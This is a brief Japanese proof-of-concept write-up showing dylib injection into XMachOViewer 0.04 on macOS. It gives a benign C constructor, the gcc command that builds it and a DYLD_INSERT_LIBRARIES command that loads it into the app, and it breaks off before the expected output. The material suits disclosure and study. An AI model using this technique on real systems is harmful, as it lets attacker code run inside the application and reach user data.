
XMachOViewer 0.04 における dylib インジェクション脆弱性の概念実証エクスプロイト。macOS 上で DYLD_INSERT_LIBRARIES を介した不正なコード実行を実証します。
XMachOViewer 0.04 における dylib インジェクションの脆弱性により、攻撃者は整合性を損なう可能性があります。これを悪用すると、不正なコードが製品のプロセスに注入され、リモートコントロールや機密性の高いユーザーデータへの不正アクセスにつながる可能性があります。

macOS 用ポータブル版
#include <syslog.h>
#include <stdio.h>
__attribute__((constructor))
static void poc(void)
{
printf("Malicious Dylib Inserted");
}
コンパイル
gcc -dynamiclib -arch x86_64 -o poc.dylib poc.c
そして、それを注入します:
DYLD_INSERT_LIBRARIES=poc.dylib /Applications/XMachOViewer.app/Contents/MacOS/XMachOViewer
これにより、アプリケーションが起動し、dylib が実行されます。アプリケーションを閉じると、ターミナルに次のように表示されます:
